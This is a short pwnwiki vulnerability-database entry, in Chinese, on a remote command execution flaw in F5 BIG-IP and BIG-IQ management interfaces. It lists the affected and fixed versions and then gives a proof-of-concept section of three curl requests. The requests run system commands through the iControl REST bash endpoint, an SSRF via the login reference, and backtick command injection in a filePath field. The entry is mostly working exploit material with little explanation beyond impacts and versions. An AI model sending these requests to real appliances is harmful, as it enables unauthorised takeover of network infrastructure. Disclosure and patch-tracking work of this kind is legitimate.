免费、自由、人人可编辑的漏洞库
,
漏洞危害
- 执行任意系统命令
- 创建或删除文件
- 禁用服务
影响版本
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 16.x 16.0.0 – 16.0.1 16.0.1.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 15.x 15.1.0 – 15.1.2 15.1.2.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 14.x 14.1.0 – 14.1.3 14.1.4 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 13.x 13.1.0 – 13.1.3 13.1.3.6 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 12.x 12.1.0 – 12.1.5 12.1.5.3* BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 11.x None Not applicable BIG-IQ Centralized Management 8.x None 8.0.0 BIG-IQ Centralized Management 7.x 7.1.0, 7.0.0 7.1.0.3, 7.0.0.2 BIG-IQ Centralized Management 6.x 6.0.0 – 6.1.0 None
POC
1.
curl -su admin: -H "Content-Type: application/json" http://victimIP/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
2.
curl -ks https://victimIP/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'
3.
curl -ksu admin:redacted https://vimtimIP/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
免费、自由、人人可编辑的漏洞库--pwnwiki.com
